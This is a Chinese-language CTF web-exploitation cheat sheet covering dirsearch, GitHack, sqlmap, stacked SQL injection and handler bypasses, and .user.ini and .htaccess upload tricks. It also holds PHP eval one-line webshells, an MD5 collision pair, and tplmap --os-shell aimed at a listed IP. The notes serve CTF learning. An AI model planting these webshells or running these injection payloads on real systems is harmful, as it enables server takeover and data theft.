CTF-Web渗透(入门|笔记|工具)

news2024/12/28 5:20:31

php各种漏洞绕过

传送门:https://cloud.tencent.com/developer/article/2127498

php伪协议

详细博客讲解:

https://blog.csdn.net/cosmoslin/article/details/120695429

http://hummer.vin/2022/05/10/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE/

https://www.cnblogs.com/wjrblogs/p/12285202.html

已经离线到本地

大概就是绕过一些文件包含函数的过滤信息,比如通过base64加密后

后台扫描

dirsearch

  • 扫描目标
-u,--url                    目标url
-l,--url-list=FILE          目标url文件路径 
--stdin                     从标准输入中指定url
--cidr                      目标网段
--raw=File                  从文件中读取request报文,通过-schema指定策略(如--schema https)

  • 扫描的字典类型
-e,--extensions             包含的文件拓展名(逗号分隔)  如-e php,asp  
-X,--exclude-extensions     排除的文件拓展名(逗号分隔)  如-X asp,jsp
-f,--force-extensions       在字典的每条记录后面添加文件拓展名

dirsearch默认只会替换字典中%EXT%为指定的extensions 
如-e php  Wishlist.%EXT%-->Wishlist.php

  • 字典格式
-w,--wordlists              自定义wordlist(以逗号分隔)
--prefixes                  添加自定义前缀
--suffixes			        添加自定义后缀
--only-selected      	    筛选出指定的文件拓展名或无文件拓展名的目录
--remove-extensions   	    移除所有wordlist的后缀名 (admin.php --> admin)
-U, --uppercase      	    将字典转换为大写
-L, --lowercase		 	    将字典转换为小写
-C, --capital        	    第一个字母大写剩下字母小写

  • 响应结果的过滤
-i                    		保留的响应状态码(以逗号分隔,支持指定范围)(-i 200,300-399)
-x                    		排除的响应状态码(以逗号分隔,支持指定范围)(-x 301,500-599)
--exclude-sizes             通过大小排除(以逗号分隔)(123B,4KB)
--exclude-texts     		通过文本内容排除响应('Not found', 'Error')
--exclude-regexps  			通过正则匹配排除响应('Not foun[a-z]{1}', '^Error$')
--exclude-redirects 		通过正则跳转目标排除响应('https://okta.com/*')
--minimal 					最小响应报文长度
--maximal 					最大响应报文长度

  • 请求相关设置
-m,--http-method    	    HTTP请求方法 默认为GET
-d,--data   				HTTP请求数据
-H,--header  				请求头 如(-H 'Referer: example.com' -H 'Accept: */*')
--header-list=FILE  		从文件中读取请求头
-F,--follow-redirects  	    跟随HTTP跳转
--user-agent  			    设置user-agent字段
--cookie  				 	设置cookie
  • 连接相关设置
--timeout=TIMEOUT     		连接超时时间
--ip=IP   					服务器ip地址
-s DELAY, --delay=DELAY     每次请求间隔的时间
--proxy=PROXY   			代理url 支持HTTP和SOCKS代理 如(localhost:8080, socks5://localhost:8088)
--proxy-list=FILE 		    包含代理服务器的地址
--matches-proxy=PROXY       Proxy to replay with found paths
--scheme   					默认的策略 用于从文件中导入请求或url中不包含协议
--max-retries 			    最大重连次数
-b,--request-by-hostname 	强制通过域名连接,(默认为了速度,使用ip连接)
--exit-on-error    		    出现错误时退出
--debug					    Debug模式

  • 通用设置
--version  显示dirsearch的版本
-h --help   帮助提示
-r,--recursive        	    递归爆破
-R,--recursion-depth  		最大递归的层数
-t,--threads         		线程数
--subdirs             		扫描子目录 如(admin/ 则www.example.com/admin/+字典)
--exclude-subdirs     		在递归扫描中排除的子目录
-q,--quiet-mode             安静模式
--full-url                  打印出完整的url
--no-color                  无颜色输出信息

  • 输出模式
--simple-report=OUTPUTFILE
--plain-text-report=OUTPUTFILE
--json-report=OUTPUTFILE
--xml-report=OUTPUTFILE
--markdown-report=OUTPUTFILE
--csv-report=OUTPUTFILE

常见的用法:

简单用法

  • 采用默认设置扫描目标url
    python3 dirsearch.py -u https://target
  • 使用文件拓展名为php,html,js的字典扫描目标url
    python3 dirsearch.py -e php,html,js -u https://target
  • 采用指定路径的wordlist且拓展名为php,html,js的字典扫描目标url
    python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlist
  • 递归扫描python3 dirsearch.py -e php,html,js -u https://target -r
  • 设置递归层数为3
    python3 dirsearch.py -e php,html,js -u https://target -r -R 3
  • 指定线程(不建议线程数调整过大,可能会影响扫描的结果)
    python3 dirsearch.py -e bak,zip,tgz,txt -u https://target -t 30
  • 使用前缀后缀
    python3 dirsearch.py -e php -u https://target --prefixes .,admin,_,~(前缀)

更多内容请参考:https://blog.csdn.net/qq_43936524/article/details/115271837

版本泄露

git泄露

可以通过GitHack下载项目代码,然后我们进行代码审计,使用命令如下:
GitHack.py http://www.openssl.org(目标网址)/.git/

SQL注入

sqli-labs笔记:https://acmer.blog.csdn.net/article/details/127851636

离线到本地

sqlmap常用命令:

sqlmap -u “注入地址” -v 1-dbs # 列举数据库
sqlmap -u “注入地址” -v 1-current-db # 当前数据库
sqlmap -u “注入地址” -v 1-users # 列数据库用户
sqlmap -u “注入地址” -v 1 -D “数据库” –-tables # 列举数据库的表名
sqlmap.py -u “注入地址” -v 1 -T “表名” -D “数据库” –-columns # 获取表的列名
sqlmap.py -u “注入地址” -v 1 -T “表名” -D “数据库” -C “字段” –-dump # 获取表中的数据

注意的点

  • B:Boolean-based-blind(布尔型注入)

  • U:Union query-based (联合注入)

  • E:Error-based (报错型注入)

  • S:Starked queries (通过sqlmap读取文件系统、操作系统、注册表必须 使用该参数,可多语句查询注入)

  • T:Time-based blind (基于时间延迟注入)

  • -–batch 默认选项运行

  • --dbs 爆破数据库

  • -–technique 指定sqlmap使用的检测技术

sqlmap -u "http://localhost/Less-1/?id=1" --dbs --batch --technique B

按理说应该所有类型的注入都跑一次

  • 如果有的时候注入点存在,但是执行一些其他语句不行,可能是关键字被过滤了,此时我们需要考虑通过大小写或者双写绕过,例如常见的select过滤了

堆叠注入流程

通过结束符;来执行多条语句
如-1’;show databases;#查所有数据库名
-1’;show tables;#查数据库表 寻找可用的数据库下的表名
或者是-1’;show tables from datebase_name
针对union select被禁用的情况下2
-1’;show columns from table_name;#查字段名 注意表名是直接表示出来 不加‘’
最后
-1’;select flag from table_name
求中可以使用sel/**/ect过滤

例题:https://buuoj.cn/challenges#[GYCTF2020]Blacklist

还需要看一下下面的handler绕过

其余绕过

  • mysql在查询不存在的数据时,会自动构建虚拟数据,一般数据存储要么明文,要么MD5

例如:https://buuoj.cn/challenges#[GXYCTF2019]BabySQli

handler 绕过

语法:

handler [table_name] open;
handler [table_name] read first;
handler [table_name] read next;

eg: 1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;

XSS注入

可以参见XSS-labs:https://acmer.blog.csdn.net/article/details/127578322

离线到本地

XSS闯关:https://blog.csdn.net/m_de_g/article/details/119085955

离线到本地

包含沙箱逃逸、xss模板注入

文件上传漏洞

.user.ini

需要上传的目录下有php文件,然后上传一句话木马(这里可能需要抓包改包,可能存在过滤),然后用蚁剑链接php文件,别链接木马
格式:

GIF89a
auto_prepend_file=number.png

.htaccess

<FileMatch "digit-shell.png">
SetHandler application/x-httpd-php
</FileMatch>

一句话木马

  • version-1
<?php @eval($_POST[123]);?>
  • version-2
GIF89a
<?php @eval($_POST['shell']);?>
  • version-3
GIF89a
<script language='php'>eval($_POST['shell']);</script>
  • version-4

图片马

内容太大,而且是乱码,我就不放上来了

php序列化和反序列化

这里面主要是考一个php类的魔法函数,笔记在本地的ctf-tool里面

md5绕过

https://blog.csdn.net/LYJ20010728/article/details/116779357

离线到本地了

MD5强碰撞

if((string)$_POST['param1']!==(string)$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
        die("success!);
}

Param1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
Param2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

SSTI模板注入

https://blog.csdn.net/weixin_53150482/article/details/125842465
博客已经离线到本地了

一个比较傻瓜的工具:tplmap

安装教程:https://www.cnblogs.com/ktsm/p/15691652.html

使用方法:

  • 探测注入点
    python2 tplmap.py -u 'http://114.67.175.224:11338/?flag'

在这里插入图片描述

  • 获取shell
    python2 tplmap.py -u 'http://114.67.175.224:11338/?flag' --os-shell

在这里插入图片描述
拿到权限后,我们就人肉扫一下可能存在的flag相关文件,然后再做具体分析


有的时候可能文件里面没有什么线索,那就看看env吧,也许就在里面:

例题:https://buuoj.cn/challenges#[Flask]SSTI

在这里插入图片描述

备份文件

.index.php.swp

robots.txt

index.php~

index.php.bak

flask session伪造

https://blog.csdn.net/since_2020/article/details/119543172

已经离线

例题:https://buuoj.cn/challenges#[%E7%AC%AC%E4%B8%80%E7%AB%A0%20web%E5%85%A5%E9%97%A8]afr_3

常用的headers

  • Referer
  • Origin
  • User-Agent
  • X-Forwarded-For
  • X-Real-IP
  • cookie

Web-tool

下载地址:

链接:https://pan.baidu.com/s/10lu7wSBREUa3-NreeOquIw
提取码:sa6d
–来自百度网盘超级会员V3的分享

这个工具包是笔者使用的,里面也包含了一些笔记和资料,有需要的可以下载哦~

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/132454.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Codeforces Round #833 (Div. 2)

题目链接 A. The Ultimate Square 题意&#xff1a; 给你一个n&#xff0c;表示有n块砖&#xff0c;第i块砖是1*(i/2)&#xff0c;这里是上取整&#xff0c;问你最大能组合成的正方形的边长是多少 思路&#xff1a; 观察样例就会发现是n/2上取整&#xff0c;下面看代码&…

快速了解网络原理

作者&#xff1a;~小明学编程 文章专栏&#xff1a;JavaEE 格言&#xff1a;热爱编程的&#xff0c;终将被编程所厚爱。 目录 局域网和广域网 局域网 局域网组建的方式 广域网 网络通信基础 IP地址 端口号 协议 什么是协议 协议分层 分层模型 OSI七层模型 TCP/IP…

Python解题 - CSDN周赛第18期 - 又见背包

卧床一周&#xff0c;一觉醒来&#xff0c;恍如隔世&#xff0c;做什么事都提不起兴趣&#xff0c;也不知道这算不算后遗症。 本期的题目还是比较简单的&#xff0c;也有几道做过的题。最后一道照搬过来的背包题也是比较经典的01背包了&#xff0c;整体感觉没有什么值得说的&am…

linux常用命令(四)- 文件备份解压缩

查看压缩文件信息 - zipinfo zipinfo命令用于列出压缩文件信息。 语法 zipinfo [-12hsvz][压缩文件]-1 只列出文件名称。-2 此参数的效果和指定"-1"参数类似&#xff0c;但可搭配"-h",“-t"和”-z"参数使用。-h 只列出压缩文件的文件名称。-s…

c++11 标准模板(STL)(std::deque)(四)

定义于头文件 <deque> std::deque 元素访问 访问指定的元素&#xff0c;同时进行越界检查 std::deque<T,Allocator>::at reference at( size_type pos ); const_reference at( size_type pos ) const; 返回位于指定位置 pos 的元素的引用&#xff0c;有边…

如何在PVE(Proxmox)中安装OpenWrt软路由?

出处&#xff1a; https://www.928wang.cn/archives/1763.html https://blog.itwk.cc/post/pve_install_openwrt.html 工具准备 WinSCP或者XFTPOpenWrt镜像(自行寻找)安装好PVE的主机一台 安装教程 镜像上传 将下载好的OpenWrt img镜像上传到 PVE主机中(这里使用XFTP工具) 选…

MySQL中的DDL、DML、DCL、DQL

SQL分类 DDL(Data Definition Language)数据定义语言 用来定义数据库对象&#xff1a;数据库&#xff0c;表&#xff0c;列等。关键字&#xff1a;create, drop,alter 等 DML(Data Manipulation Language)数据操作语言 用来对数据库中表的数据进行增删改。关键字&#xff1a;i…

vue-element-表格 Excel 【导入】功能 (2023元旦快乐~~~)

一、页面表格导入功能 我们借鉴vue-element-admin文件来学习表格导入功能,如果你有vue-element-admin的完整文件&#xff0c;可以去这里找 or 用我这里的代码 1. 整体复制到你要用到的页面 <template><div class"app-container"><upload-excel-com…

unreal engine 纹理动态运动的实现

先用ps涉及一张图,发光的地方为白色 下图实际上边缘是相连的白色 split_line.jpgue新建材质 基础色vector3 随便选择一个偏灰的颜色 自发光 TextureCoordirate ->Panner->图片rgb->*发光常量 * 20自发光 预览效果 通过修改纹理协调器的V垂直平铺控制条纹数量 image.pn…

mybatis插件

Configuration组成 Mapper映射器 3个部分组成&#xff1a; MappedStatement 保存一个节点(select | insert | update | delete) &#xff0c;包括我们配置的sql&#xff0c;&#xff0c;sql的id&#xff0c;&#xff0c;缓存信息&#xff0c;&#xff0c;resultMap,parameterT…

Redis高并发锁(三)分布式锁

在很多情况下&#xff0c;你的数据库不支持事务&#xff0c;分布式部署也使得你无法去使用JVM锁&#xff0c;那么这种时候&#xff0c;你可以考虑用分布式锁 文章目录分布式锁1. 实现方式2. 特征3. 操作4. 代码改造5. 测试优化1. 递归改成循环2. 防止死锁3. 防误删4. LUA脚本 保…

Arduino code for RS-365PW 16120

Pictures These pictures are from Baidu Search. Picture 1: Installment Picture 2: Appearance Picture 3: Encoder of Motor Picture 4: Pins location and number Physical Specification Brand: Mabuchi Motor (万宝至电机)Type: RS-365PW 16120 Body length&#xff1…

学生抢课接口(高并发入门)

目录 使用Mysql 常规测试 张三测试 流程总结 redis优化 修改代码 测试 使用分布式锁 总结 使用Mysql 常规测试 原始代码: Override Transactional public ResponseResult selectCourse(SelectParmas selectParmas) {if (Objects.isNull(selectParmas)){return new …

【python游戏】新的一年快来变身兔兔战士打败獾守护兔兔吧~

前言 大家早好、午好、晚好吖 ❤ ~ 一只快乐兔&#xff0c; 来到快乐山&#xff0c;喝了快乐泉&#xff0c; 又到快乐殿&#xff0c;吃了快乐莲&#xff0c;遇到快乐仙&#xff0c; 听了快乐言&#xff1a;快乐很简单&#xff0c;快乐在身边&#xff0c;快乐无极限&#xff…

C++中STL的vector扩容机制

目录前言发生扩容扩容机制size()和capacity()reserve()和resize()前言 前阵子面试的时候&#xff0c;被问到往vector中插入一个数据可能会发生什么&#xff1f; 我答:可能会扩容; 为啥vector支持变长&#xff1f; 我答:它实在堆上动态申请内存&#xff0c;因此有自己的一套扩容…

Redis集群系列十 —— 集群伸缩之收缩

集群收缩原理 集群收缩就是让其中一些节点安全下线。 所谓的安全下线指的是让一个节点下线之前&#xff0c;把其负责的所有 slots 迁移到别的节点上&#xff0c;否则该节点下线后其负责的 slots 就没法继续提供服务了。 收缩流程如下&#xff1a; 需求 前面扩容完成后&…

字符串大小写转化,有序数组二分查找个人心得等若干内容

tips 1. 在电脑里面&#xff0c;任何一切字符&#xff0c;当一看到的时候&#xff0c;脑子里面就要把它转化成ACSII值。如while(0)&#xff0c;可以实现死循环。 2. 统计整形数组的长度不能用strlen()&#xff0c;别一天到晚用到底&#xff0c;strlen统计的是字符数组的长度 …

在wsl下开发T113的主线linux(1)-准备wsl开发环境

首先在win10或win11下安装wsl&#xff0c;选择wsl1或者wsl2都可以&#xff0c;wsl2的性能更高一些&#xff0c;wsl1的跨系统文件操作速度更快一些&#xff0c;我这里因为有一些工程在win文件系统下&#xff0c;所以选择了wsl1&#xff0c;发行版使用最新的Ubuntu 22.04.01 LTS。…

MySQL隐式转换

隐式转换概念 When an operator is used with operands of different types, type conversion occurs to make the operands compatible. Some conversions occur implicitly. 当运算符与不同类型的操作数一起使用时&#xff0c;将进行类型转换以使操作数兼容。某些转换是隐式发…

2022年年终总结---新方向,新期待

2022年行将结束&#xff0c;回首年初立下的flag&#xff1a; (1)完成OpenCoord版本升级&#xff0c;增加ITRF框架及历元转换、EGM2008查询功能&#xff1b; (2)完成多波束开源项目的数据读取和显示操作。 任务(1)已经完成了&#xff0c;任务&#xff08;2&#xff09;没有完成。…